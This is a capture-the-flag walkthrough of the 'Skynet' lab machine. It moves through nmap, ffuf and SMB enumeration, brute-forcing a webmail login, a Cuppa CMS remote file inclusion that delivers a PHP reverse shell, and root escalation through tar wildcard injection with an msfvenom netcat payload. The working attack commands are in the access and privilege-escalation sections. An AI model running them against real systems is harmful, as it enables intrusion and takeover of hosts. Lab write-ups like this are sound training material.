5 minute read


General Enumeration and Initial Findings (Nmap, FFuF, SMBClient)

Starting off, as always, with a basic nmap scan

nmap -sC -sV -oN initial -T4

Nmap scan report for
Host is up (0.21s latency).
Not shown: 994 closed ports
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
|   256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_  256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open  pop3        Dovecot pop3d
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imap
|_imap-capabilities: SASL-IR more post-login have IDLE listed capabilities LITERAL+ ENABLE OK ID Pre-login LOGINDISABLEDA0001 IMAP4rev1 LOGIN-REFERRALS
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h40m01s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: skynet
|   NetBIOS computer name: SKYNET\x00
|   Domain name: \x00
|   FQDN: skynet
|_  System time: 2021-06-06T08:26:40-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-06-06T13:26:40
|_  start_date: N/A

A few interesting ports.

80 - Webserver

139 and 445 - SMB.

Let’s kick around the webserver


Search engine that does… nothing? Nothing in the source, no robots.txt. Let’s see if we can bust some directories with FFuF using the Seclists Common list matching all response codes and filtering 404s

ffuf -u -w /common.txt -mc all -fc 404

.htaccess               [Status: 403, Size: 276, Words: 20, Lines: 10]
.htpasswd               [Status: 403, Size: 276, Words: 20, Lines: 10]
.hta                    [Status: 403, Size: 276, Words: 20, Lines: 10]
admin                   [Status: 301, Size: 310, Words: 20, Lines: 10]
config                  [Status: 301, Size: 311, Words: 20, Lines: 10]
css                     [Status: 301, Size: 308, Words: 20, Lines: 10]
index.html              [Status: 200, Size: 523, Words: 26, Lines: 19]
js                      [Status: 301, Size: 307, Words: 20, Lines: 10]
server-status           [Status: 403, Size: 276, Words: 20, Lines: 10]
squirrelmail            [Status: 301, Size: 317, Words: 20, Lines: 10]

/admin and /config are Forbidden but how about /squirrelmail?


Login page. Let’s do some more enumeration before trying to crack this.

Since 139 and 445 are open, we’ll take a look at some SMB enumeration using smbclient

smbclient -L \\\\\\


Two interesting shares. anonymous and milesdyson

smbclient \\\\\\anonymous


Grab attention.txt with get attention.txt

A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson

logs is a directory with three files, only 1 has data


Grab log1.txt with get log1.txt


Passwords maybe? Let’s go back to /squirrelmail and see if any of these work for. We saw that there was a milesdyson share, so maybe that’s a username? Let’s use FFuF again, but this time to brute this login form.

Capture the login request in burp to build the command.


ffuf -u -d "login_username=milesdyson&secretkey=FUZZ&js_autodetect_results=1&just_logged_in=1" -H "Content-type: application/x-www-form-urlencoded" -w log1.txt
cyborg007haloterminator [Status: 302, Size: 0, Words: 1, Lines: 1]

Got a 302 redirect, which means this is likely our password. Log in!




SMB password?! Maybe we can access the milesdyson share now!


cd notes ls


Grab important.txt with get important.txt

1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife

New endpoint! /45kra24zxs28v3yd

Access (Cuppa CMS, Remote File Inclusion, FFuF)


Running FFuF using Seclists Common list matching all response codes and filtering 404s

.htaccess               [Status: 403, Size: 276, Words: 20, Lines: 10]
.htpasswd               [Status: 403, Size: 276, Words: 20, Lines: 10]
.hta                    [Status: 403, Size: 276, Words: 20, Lines: 10]
administrator           [Status: 301, Size: 335, Words: 20, Lines: 10]
index.html              [Status: 200, Size: 418, Words: 45, Lines: 16]


Cuppa cms


Looks like there’s a LFI/RFI exploit for Cuppa CMS

Using the PoC to make sure it’s vulnerable. Decoded:

	class Configuration{
		public $host = "localhost";
		public $db = "cuppa";
		public $user = "root";
		public $password = "password123";
		public $table_prefix = "cu_";
		public $administrator_template = "default";
		public $list_limit = 25;
		public $token = "OBqIPqlFWf3X";
		public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
		public $upload_default_path = "media/uploadsFiles";
		public $maximum_file_size = "5242880";
		public $secure_login = 0;
		public $secure_login_value = "";
		public $secure_login_redirect = "";

So we have LFI, let’s try RFI

Using php-reverse-shell.php from pentestmonkey.

  1. Edit the relevant values (IP and PORT)
  2. Host it on a webserver - python3 -m http.server
  3. Start a listener - nc -lvnp 4444
  4. Include your URL - alerts/alertConfigField.php?urlConfig=http://IP:PORT/php-reverse-shell.php
  5. Send it!


Privesc (tar checkpoints, Wildcard Injection, msfvenom)

Password reuse! Using cyborg007haloterminator we can switch to the milesdyson user.

There’s an interesting script in /home/milesdyson/backups called

milesdyson@skynet:~/backups$ cat

cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *

Let’s check if it’s running as a cronjob

cat /etc/crontab

# m h dom mon dow user	command
*/1 *	* * *   root	/home/milesdyson/backups/
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

So every minute it’s running the script, which means it’s changing to the /var/www/html directory and running tar cf on everything. milesdyson doesn’t have write access to /var/www/html, but if we drop back down to www-data we do!

Since tar is using a wildcard it’s vulnerable to injection by creating files with names that represent tar checkpoints:


Create a reverse shell using msfvenom and start a listener

msfvenom -p cmd/unix/reverse_netcat lhost=IP lport=PORT R 

nc -lvnp PORT
touch -- "--checkpoint-action=exec=sh"
touch -- --checkpoint=1

Notice the inclusion of -- before the file name, this allows us to create filenames with special characters.

Now we wait…